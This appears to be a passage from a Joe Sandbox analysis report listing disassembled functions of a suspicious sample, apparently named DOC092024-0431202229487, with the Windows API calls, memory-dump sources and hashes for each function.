                                                          • Part of subcall function 00738984: RtlEnterCriticalSection.NTDLL(00730127), ref: 007389AF
                                                        • __calloc_crt.LIBCMT ref: 0073BA85
                                                          • Part of subcall function 00737616: __calloc_impl.LIBCMT ref: 00737625
                                                          • Part of subcall function 00737616: Sleep.KERNEL32(00000000,?,00730127,?,0071125D,00000058,?,?), ref: 0073763C
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0073BAA0
                                                        • GetStartupInfoW.KERNEL32(?,007C6990,00000064,00736B14,007C67D8,00000014), ref: 0073BAF9
                                                        • __calloc_crt.LIBCMT ref: 0073BB44
                                                        • GetFileType.KERNEL32(00000001), ref: 0073BB8B
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0073BBC4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 1426640281-0
                                                        • Opcode ID: f1d343491622ddf47485026a3f2a0df85a4997670dc023cd4df771d3bc81542e
                                                        • Instruction ID: ef0bc629c128fe5ed85854b1d1a12051e2cbc18c5f2cd448ea54e1da55f7a7a6
                                                        • Opcode Fuzzy Hash: f1d343491622ddf47485026a3f2a0df85a4997670dc023cd4df771d3bc81542e
                                                        • Instruction Fuzzy Hash: 2B81D5B0905745CFEB24CF68C8546ADBBB0AF05324F24925ED5A6A73D2DB3C9803CB64
                                                        Function 00754A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00754A7D
                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00753AD7,?,00000001), ref: 00754A91
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00754A98
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00753AD7,?,00000001), ref: 00754AA7
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00754AB9
                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00753AD7,?,00000001), ref: 00754AD2
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00753AD7,?,00000001), ref: 00754AE4
                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00753AD7,?,00000001), ref: 00754B29
                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00753AD7,?,00000001), ref: 00754B3E
                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00753AD7,?,00000001), ref: 00754B49
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: 8541f3925b18ac577b524a27298d4b2a870ce60f328f14864cdb39e32d72b1c5
                                                        • Instruction ID: f20c975985742f9249c17e9ace513acc88e71647073e0c7f2ca24df434ab7e52
                                                        • Opcode Fuzzy Hash: 8541f3925b18ac577b524a27298d4b2a870ce60f328f14864cdb39e32d72b1c5
                                                        • Instruction Fuzzy Hash: 9731A5B1601204BFDB209B54EC88BA977BAEB80356F14C006FD04D7190D7FDDD858B69
                                                        Function 0078EC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClientRect.USER32(?), ref: 0078EC32
                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0078EC49
                                                        • GetWindowDC.USER32(?), ref: 0078EC55
                                                        • GetPixel.GDI32(00000000,?,?), ref: 0078EC64
                                                        • ReleaseDC.USER32(?,00000000), ref: 0078EC76
                                                        • GetSysColor.USER32(00000005), ref: 0078EC94
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                        • String ID:
                                                        • API String ID: 272304278-0
                                                        • Opcode ID: 8eb2187a6fffc01327452f0906befd92d1825dc328f4f3dbd39c5591b2d8d021
                                                        • Instruction ID: b5f3f56f9002902a6fbb058f86b225cb12f664c5ad4b330056aa15253c6784de
                                                        • Opcode Fuzzy Hash: 8eb2187a6fffc01327452f0906befd92d1825dc328f4f3dbd39c5591b2d8d021
                                                        • Instruction Fuzzy Hash: 74215C31540208EFDB21AB64EC48BA97B71FB04321F118222FA26A50E1DB390D52DF25
                                                        Function 0074D978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnumChildWindows.USER32(?,0074DD46), ref: 0074DC86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ChildEnumWindows
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 3555792229-1603158881
                                                        • Opcode ID: 638728c842c9126c341159fa220d312ac30d7f83d40ec706814779a23a110cca
                                                        • Instruction ID: 1aab84f2e8922015c6fa71c35b270a6db90d8a5e06d86aed39334b8f19b33263
                                                        • Opcode Fuzzy Hash: 638728c842c9126c341159fa220d312ac30d7f83d40ec706814779a23a110cca
                                                        • Instruction Fuzzy Hash: C191B770A00506EACB18DF64C4D5BEDF7B5FF04310F548129D89AA7291DF786D8ACBA0
                                                        Function 007145A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007145F0
                                                        • CoUninitialize.COMBASE ref: 00714695
                                                        • UnregisterHotKey.USER32(?), ref: 007147BD
                                                        • DestroyWindow.USER32(?), ref: 00785936
                                                        • FreeLibrary.KERNEL32(?), ref: 0078599D
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007859CA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 469580280-3243417748
                                                        • Opcode ID: d66ab7790735f44871e0a055d3b6618dc2f062e493538ce49668af8af70fc75f
                                                        • Instruction ID: 8504208418025309b91ec6a8c59da8015a72d74c307c90ee93d0251faf1d7b90
                                                        • Opcode Fuzzy Hash: d66ab7790735f44871e0a055d3b6618dc2f062e493538ce49668af8af70fc75f
                                                        • Instruction Fuzzy Hash: FD912035600602CFC719EF18D899EA8F3B4FF15704F5541A9E40AA72A2DB38ADA7CF54
                                                        Function 0072C24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 0072C2D2
                                                          • Part of subcall function 0072C697: GetClientRect.USER32(?,?), ref: 0072C6C0
                                                          • Part of subcall function 0072C697: GetWindowRect.USER32(?,?), ref: 0072C701
                                                          • Part of subcall function 0072C697: ScreenToClient.USER32(?,?), ref: 0072C729
                                                        • GetDC.USER32 ref: 0078E006
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0078E019
                                                        • SelectObject.GDI32(00000000,00000000), ref: 0078E027
                                                        • SelectObject.GDI32(00000000,00000000), ref: 0078E03C
                                                        • ReleaseDC.USER32(?,00000000), ref: 0078E044
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0078E0CF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: U
                                                        • API String ID: 4009187628-3372436214
                                                        • Opcode ID: 3bfa6dccb5bc1fa4f174d592edb969a141e259b23890892a45c90476fa9cd4c7
                                                        • Instruction ID: 849615fae4a91bde30d256760ae0c94500c66238404bd96573d53e7fc37427b3
                                                        • Opcode Fuzzy Hash: 3bfa6dccb5bc1fa4f174d592edb969a141e259b23890892a45c90476fa9cd4c7
                                                        • Instruction Fuzzy Hash: 7871F331500208EFCF21EF64CC84AEA7BB5FF58360F248666ED555A1A6C7398C41DB61
                                                        Function 00764C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00764C5E
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00764C8A
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00764CCC
                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00764CE1
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00764CEE
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00764D1E
                                                        • InternetCloseHandle.WININET(00000000), ref: 00764D65
                                                          • Part of subcall function 007656A9: GetLastError.KERNEL32(?,?,00764A2B,00000000,00000000,00000001), ref: 007656BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                        • String ID:
                                                        • API String ID: 1241431887-3916222277
                                                        • Opcode ID: f1dfc98e6886d377b0a5ad65d1e1f0d867598850ef83f74f142e276818ac4235
                                                        • Instruction ID: 65a8da6b3e7b52c815cbcc64fd8e705dd87f0172b35dc1821be62a303d5f11cb
                                                        • Opcode Fuzzy Hash: f1dfc98e6886d377b0a5ad65d1e1f0d867598850ef83f74f142e276818ac4235
                                                        • Instruction Fuzzy Hash: 3F417FB1A01618BFEB119FA0CD89FFA77ACEF08354F108116FE029A151D7789D459BA4
                                                        Function 0076BAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007ADBF0), ref: 0076BBA1
                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007ADBF0), ref: 0076BBD5
                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0076BD33
                                                        • SysFreeString.OLEAUT32(?), ref: 0076BD5D
                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 0076BEAD
                                                        • ProgIDFromCLSID.COMBASE(?,?), ref: 0076BEF7
                                                        • CoTaskMemFree.COMBASE(?), ref: 0076BF14
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                        • String ID:
                                                        • API String ID: 793797124-0
                                                        • Opcode ID: 8de173a56b3b324df9e26a6bdae48039bff1a85c8704b795396e58cc5bb39797
                                                        • Instruction ID: 069c74e87f8c62817180cd3d1542413947453626f875f8181429d39611ee3df7
                                                        • Opcode Fuzzy Hash: 8de173a56b3b324df9e26a6bdae48039bff1a85c8704b795396e58cc5bb39797
                                                        • Instruction Fuzzy Hash: DBF10A75A00109EFCB14DFA4C888EAEB7B9FF89315F148459F906EB250DB35AE85CB50
                                                        Function 007723C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 007723E6
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00772579
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0077259D
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007725DD
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007725FF
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00772760
                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00772792
                                                        • CloseHandle.KERNEL32(?), ref: 007727C1
                                                        • CloseHandle.KERNEL32(?), ref: 00772838
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                        • String ID:
                                                        • API String ID: 4090791747-0
                                                        • Opcode ID: e16ca64e0912cbbf2a48ae75a750e63f374fc9dc408036283526dba7c26b3462
                                                        • Instruction ID: a098fca565b7d8d1d0bd96eb654732213a07a3a32a40c01b9f6fcf03805e5ab9
                                                        • Opcode Fuzzy Hash: e16ca64e0912cbbf2a48ae75a750e63f374fc9dc408036283526dba7c26b3462
                                                        • Instruction Fuzzy Hash: 8AD1D331204341DFCB25EF24C895BAABBE1AF85350F14C45DF8999B2A2DB38DC46CB52
                                                        Function 0072B86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007149CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00714954,00000000), ref: 00714A23
                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0072B85B), ref: 0072B926
                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0072B85B,00000000,?,?,0072AF1E,?,?), ref: 0072B9BD
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 0078E775
                                                        • DeleteObject.GDI32(00000000), ref: 0078E7EB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 2402799130-0
                                                        • Opcode ID: 13ef19e642e36f40c4889a78587dcae3d9a44253c0855da9b956d25c0bb8b2ba
                                                        • Instruction ID: 90181f8dcd405c54cd76c60fc04ef42b5e87ea15039b460e44e1a818650421f4
                                                        • Opcode Fuzzy Hash: 13ef19e642e36f40c4889a78587dcae3d9a44253c0855da9b956d25c0bb8b2ba
                                                        • Instruction Fuzzy Hash: AE618930101621EFDB32EF29E988B25B7F5FB45321F50852AE18686670C77CB8D1EB48
                                                        Function 0077B14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0077B204
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: a39501163c7ebf7158826743d6215927f895b56fd90b484d5e72a7a12b425099
                                                        • Instruction ID: 61c238903017bb6b7ff8c389d4cdd53fadd25596173f7874c5e914623382d7ef
                                                        • Opcode Fuzzy Hash: a39501163c7ebf7158826743d6215927f895b56fd90b484d5e72a7a12b425099
                                                        • Instruction Fuzzy Hash: F7517230500218FFEF349F688C99B9E7B65FB063A8F60C112F919D61A1CB79E990DB50
                                                        Function 0072A599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0078E9EA
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0078EA0B
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0078EA20
                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0078EA3D
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0078EA64
                                                        • DestroyCursor.USER32(00000000), ref: 0078EA6F
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0078EA8C
                                                        • DestroyCursor.USER32(00000000), ref: 0078EA97
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                        • String ID:
                                                        • API String ID: 3992029641-0
                                                        • Opcode ID: f338572bca5faea81d9f3b68c506ca72f1343876c92a0c9aefed071b47b1601f
                                                        • Instruction ID: 441f6b5addb253a1bfb81facf2e762292dffab754df6a3c2c6690886f0cb8b48
                                                        • Opcode Fuzzy Hash: f338572bca5faea81d9f3b68c506ca72f1343876c92a0c9aefed071b47b1601f
                                                        • Instruction Fuzzy Hash: D851A970600204FFDB24DF69DC85FAA77B5BB08750F108629F94697290D7B8EC90DB52
                                                        Function 0072F6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0078E9A0,00000004,00000000,00000000), ref: 0072F737
                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0078E9A0,00000004,00000000,00000000), ref: 0072F77E
                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0078E9A0,00000004,00000000,00000000), ref: 0078EB55
                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0078E9A0,00000004,00000000,00000000), ref: 0078EBC1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
